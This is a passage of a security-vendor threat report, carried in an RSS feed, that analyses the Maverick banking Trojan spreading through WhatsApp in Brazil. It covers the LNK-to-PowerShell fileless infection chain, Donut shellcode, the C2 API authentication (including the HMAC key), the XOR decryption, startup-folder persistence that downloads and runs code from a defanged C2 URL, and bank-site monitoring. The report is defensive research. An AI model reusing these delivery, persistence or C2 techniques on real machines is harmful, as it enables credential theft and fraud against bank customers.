xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution</title> <link>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/</link> <comments>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/#respond</comments> <dc:creator><![CDATA[GReAT]]></dc:creator> <pubDate>Wed, 15 Oct 2025 13:00:43 +0000</pubDate> <category><![CDATA[Malware descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Microsoft Internet Explorer]]></category> <category><![CDATA[Firefox]]></category> <category><![CDATA[Google Chrome]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Trojan Banker]]></category> <category><![CDATA[Trojan]]></category> <category><![CDATA[Brazil]]></category> <category><![CDATA[Microsoft Edge]]></category> <category><![CDATA[Coyote]]></category> <category><![CDATA[Maverick]]></category><category><![CDATA[Financial threats]]></category> <category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117715</guid> <description><![CDATA[A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It delivered a new Maverick banker, which features code overlaps with Coyote malware.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It targets mainly Brazilians and uses Portuguese-named URLs. To evade detection, the command-and-control (C2) server verifies each download to ensure it originates from the malware itself.<br />The whole infection chain is complex and fully fileless, and by the end, it will deliver a new banking Trojan named Maverick, which contains many code overlaps with <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>. In this blog post, we detail the entire infection chain, encryption algorithm, and its targets, as well as discuss the similarities with known threats.</p><h2 id="key-findings">Key findings:</h2><ul><li>A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named “Maverick” through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform.</li><li>Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts.</li><li>The new Trojan features code similarities with another Brazilian banking Trojan called <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>; however, we consider Maverick to be a new threat.</li><li>The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed.</li><li>The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay. It aims to capture banking credentials.</li><li>Once active, the new Trojan will monitor the victims’ access to 26 Brazilian bank websites, 6 cryptocurrency exchange websites, and 1 payment platform.</li><li>All infections are modular and performed in memory, with minimal disk activity, using PowerShell, .NET, and shellcode encrypted using Donut.</li><li>The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development.</li><li>Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil.</li></ul><h2 id="initial-infection-vector">Initial infection vector</h2><p>The infection chain works according to the diagram below:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png" alt="" width="2093" height="731" class="aligncenter size-full wp-image-117756" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01.png 2093w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1024x358.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-768x268.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1536x536.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-2048x715.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-1002x350.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-740x258.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-802x280.png 802w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061851/maverick-banker-01-800x279.png 800w" sizes="auto, (max-width: 2093px) 100vw, 2093px" /></a></p><p>The infection begins when the victim receives a malicious .LNK file inside a ZIP archive via a WhatsApp message. The filename can be generic, or it can pretend to be from a bank:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg" alt="" width="1009" height="546" class="aligncenter size-full wp-image-117757" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd.jpg 1009w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-300x162.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-768x416.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-647x350.jpg 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-740x400.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-517x280.jpg 517w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15061954/maverick-banker-02-upd-800x433.jpg 800w" sizes="auto, (max-width: 1009px) 100vw, 1009px" /></a></p><p>The message said, <em>“Visualization allowed only in computers. In case you’re using the Chrome browser, choose “keep file” because it’s a zipped file”.</em></p><p>The LNK is encoded to execute cmd.exe with the following arguments:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117718" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png" alt="" width="2048" height="111" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-300x16.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1024x56.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-768x42.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1536x83.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-740x40.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-1600x87.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212230/maverick-banker-distributing5-800x43.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p><p>The decoded commands point to the execution of a PowerShell script:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117720" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png" alt="" width="1633" height="39" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1.png 1633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-300x7.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1024x24.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-768x18.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1536x37.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-740x18.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-1600x38.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212353/maverick-banker-distributing1-1-800x19.png 800w" sizes="auto, (max-width: 1633px) 100vw, 1633px" /></a></p><p>The command will contact the C2 to download another PowerShell script. It is important to note that the C2 also validates the “User-Agent” of the HTTP request to ensure that it is coming from the PowerShell command. This is why, without the correct “User-Agent”, the C2 returns an HTTP 401 code.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png" alt="" width="1615" height="883" class="aligncenter size-full wp-image-117758" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd.png 1615w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-300x164.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-1024x560.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-768x420.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-1536x840.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-640x350.png 640w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-740x405.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-512x280.png 512w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062044/maverick-banker-distributing7-upd-800x437.png 800w" sizes="auto, (max-width: 1615px) 100vw, 1615px" /></a></p><p>The entry script is used to decode an embedded .NET file, and all of this occurs only in memory. The .NET file is decoded by dividing each byte by a specific value; in the script above, the value is “174”. The PE file is decoded and is then loaded as a .NET assembly within the PowerShell process, making the entire infection fileless, that is, without files on disk.<br /><a name="loader"></a></p><h3 id="initial-net-loader">Initial .NET loader</h3><p>The initial .NET loader is heavily obfuscated using Control Flow Flattening and indirect function calls, storing them in a large vector of functions and calling them from there. In addition to obfuscation, it also uses random method and variable names to hinder analysis. Nevertheless, after our analysis, we were able to reconstruct (to a certain extent) its main flow, which consists of downloading and decrypting two payloads.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117722" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png" alt="" width="2048" height="840" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-300x123.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-1024x420.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-768x315.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-1536x630.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-853x350.png 853w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-740x304.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-683x280.png 683w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212544/maverick-banker-distributing16-800x328.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p><p>The obfuscation does not hide the method’s variable names, which means it is possible to reconstruct the function easily if the same function is reused elsewhere. Most of the functions used in this initial stage are the same ones used in the final stage of the banking Trojan, which is not obfuscated. The sole purpose of this stage is to download two encrypted shellcodes from the C2. To request them, an API exposed by the C2 on the “/api/v1/” routes will be used. The requested URL is as follows:</p><ul><li>hxxps://sorvetenopote.com/api/v1/3d045ada0df942c983635e</li></ul><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117723" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png" alt="" width="1788" height="315" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4.png 1788w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1024x180.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1536x271.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-1589x280.png 1589w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212635/maverick-banker-distributing4-800x141.png 800w" sizes="auto, (max-width: 1788px) 100vw, 1788px" /></a></p><p>To communicate with its API, it sends the API key in the “X-Request-Headers” field of the HTTP request header. The API key used is calculated locally using the following algorithm:</p><ul><li>“Base64(HMAC256(Key))”</li></ul><p>The HMAC is used to sign messages with a specific key; in this case, the threat actor uses it to generate the “API Key” using the HMAC key “MaverickZapBot2025SecretKey12345”. The signed data sent to the C2 is “3d045ada0df942c983635e|1759847631|MaverickBot”, where each segment is separated by “|”. The first segment refers to the specific resource requested (the first encrypted shellcode), the second is the infection’s timestamp, and the last, “MaverickBot”, indicates that this C2 protocol may be used in future campaigns with different variants of this threat. This ensures that tools like “wget” or HTTP downloaders cannot download this stage, only the malware.</p><p>Upon response, the encrypted shellcode is a loader using Donut. At this point, the initial loader will start and follow two different execution paths: another loader for its WhatsApp infector and the final payload, which we call “MaverickBanker”. Each Donut shellcode embeds a .NET executable. The shellcode is encrypted using a XOR implementation, where the key is stored in the last bytes of the binary returned by the C2. The algorithm to decrypt the shellcode is as follows:</p><ul><li>Extract the last 4 bytes (int32) from the binary file; this indicates the size of the encryption key.</li><li>Walk backwards until you reach the beginning of the encryption key (file size – 4 – key_size).</li><li>Get the XOR key.</li><li>Apply the XOR to the entire file using the obtained key.</li></ul><h2 id="whatsapp-infector-downloader">WhatsApp infector downloader</h2><p>After the second Donut shellcode is decrypted and started, it will load another downloader using the same obfuscation method as the previous one. It behaves similarly, but this time it will download a PE file instead of a Donut shellcode. This PE file is another .NET assembly that will be loaded into the process as a module.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117724" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png" alt="" width="2045" height="818" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9.png 2045w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-1024x410.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-768x307.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-1536x614.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-875x350.png 875w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-740x296.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-700x280.png 700w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212800/maverick-banker-distributing9-800x320.png 800w" sizes="auto, (max-width: 2045px) 100vw, 2045px" /></a></p><p>One of the namespaces used by this .NET executable is named “Maverick.StageOne,” which is considered by the attacker to be the first one to be loaded. This download stage is used exclusively to download the WhatsApp infector in the same way as the previous stage. The main difference is that this time, it is not an encrypted Donut shellcode, but another .NET executable—the WhatsApp infector—which will be used to hijack the victim’s account and use it to spam their contacts in order to spread itself.</p><p>This module, which is also obfuscated, is the WhatsApp infector and represents the final payload in the infection chain. It includes a script from <a href="https://github.com/wppconnect-team/wppconnect" target="_blank" rel="noopener">WPPConnect</a>, an open-source WhatsApp automation project, as well as the Selenium browser executable, used for web automation.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117725" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png" alt="" width="1841" height="745" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8.png 1841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-300x121.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-1024x414.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-768x311.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-1536x622.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-990x400.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-865x350.png 865w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-740x299.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-692x280.png 692w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212842/maverick-banker-distributing8-800x324.png 800w" sizes="auto, (max-width: 1841px) 100vw, 1841px" /></a></p><p>The executable’s namespace name is “ZAP”, a very common word in Brazil to refer to WhatsApp. These files use almost the same obfuscation techniques as the previous examples, but the method’s variable names remain in the source code. The main behavior of this stage is to locate the WhatsApp window in the browser and use WPPConnect to instrument it, causing the infected victim to send messages to their contacts and thus spread again. The file sent depends on the “MaverickBot” executable, which will be discussed in the next section.</p><h2 id="maverick-the-banking-trojan">Maverick, the banking Trojan</h2><p>The Maverick Banker comes from a different execution branch than the WhatsApp infector; it is the result of the second Donut shellcode. There are no additional download steps to execute it. This is the main payload of this campaign and is embedded within another encrypted executable named “Maverick Agent,” which performs extended activities on the machine, such as contacting the C2 and keylogging. It is described in the next section.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117726" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png" alt="" width="1443" height="1124" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10.png 1443w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-300x234.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-1024x798.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-768x598.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-449x350.png 449w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-740x576.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-359x280.png 359w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13212938/maverick-banker-distributing10-800x623.png 800w" sizes="auto, (max-width: 1443px) 100vw, 1443px" /></a></p><p>Upon the initial loading of Maverick Banker, it will attempt to register persistence using the startup folder. At this point, if persistence does not exist, by checking for the existence of a .bat file in the “Startup” directory, it will not only check for the file’s existence but also perform a pattern match to see if the string “for %%” is present, which is part of the initial loading process. If such a file does not exist, it will generate a new “GUID” and remove the first 6 characters. The persistence batch script will then be stored as:</p><ul><li>“C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\” + “HealthApp-” + GUID + “.bat”.</li></ul><p>Next, it will generate the bat command using the hardcoded URL, which in this case is:</p><ul><li>“hxxps://sorvetenopote.com” + “/api/itbi/startup/” + NEW_GUID.</li></ul><p>In the command generation function, it is possible to see the creation of an entirely new obfuscated PowerShell script.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png" alt="" width="1719" height="631" class="aligncenter size-full wp-image-117759" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd.png 1719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-300x110.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-1024x376.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-768x282.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-1536x564.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-953x350.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-740x272.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-763x280.png 763w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062224/maverick-banker-distributing6-upd-800x294.png 800w" sizes="auto, (max-width: 1719px) 100vw, 1719px" /></a></p><p>First, it will create a variable named “$URL” and assign it the content passed as a parameter, create a “Net.WebClient” object, and call the “DownloadString.Invoke($URL)” function. Immediately after creating these small commands, it will encode them in base64. In general, the script will create a full obfuscation using functions to automatically and randomly generate blocks in PowerShell. The persistence script reassembles the initial LNK file used to start the infection.</p><p>This persistence mechanism seems a bit strange at first glance, as it always depends on the C2 being online. However, it is in fact clever, since the malware would not work without the C2. Thus, saving only the bootstrap .bat file ensures that the entire infection remains in memory. If persistence is achieved, it will start its true function, which is mainly to monitor browsers to check if they open banking pages.</p><p>The browsers running on the machine are checked for possible domains accessed on the victim’s machine to verify the web page visited by the victim. The program will use the current foreground window (window in focus) and its PID; with the PID, it will extract the process name. Monitoring will only continue if the victim is using one of the following browsers:</p><p>* Chrome<br />* Firefox<br />* MS Edge<br />* Brave<br />* Internet Explorer<br />* Specific bank web browser</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png" alt="" width="1814" height="636" class="aligncenter size-full wp-image-117760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3.png 1814w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-768x269.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-1536x539.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-998x350.png 998w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-740x259.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-799x280.png 799w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062253/maverick-banker-14-3-800x280.png 800w" sizes="auto, (max-width: 1814px) 100vw, 1814px" /></a></p><p>If any browser from the list above is running, the malware will use UI Automation to extract the title of the currently open tab and use this information with a predefined list of target online banking sites to determine whether to perform any action on them. The list of target banks is compressed with gzip, encrypted using AES-256, and stored as a base64 string. The AES initialization vector (IV) is stored in the first 16 bytes of the decoded base64 data, and the key is stored in the next 32 bytes. The actual encrypted data begins at offset 48.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png" alt="" width="1689" height="1528" class="aligncenter size-full wp-image-117761" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd.png 1689w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-300x271.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-1024x926.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-768x695.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-1536x1390.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-387x350.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-740x669.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-310x280.png 310w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15062323/maverick-banker-distributing12-upd-800x724.png 800w" sizes="auto, (max-width: 1689px) 100vw, 1689px" /></a></p><p>This encryption mechanism is the same one used by <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a banking Trojan also written in .NET and documented by us in early 2024.</p><p>If any of these banks are found, the program will decrypt another PE file using the same algorithm described in the <a href="#loader">.NET Loader</a> section of this report and will load it as an assembly, calling its entry point with the name of the open bank as an argument. This new PE is called “Maverick.Agent” and contains most of the banking logic 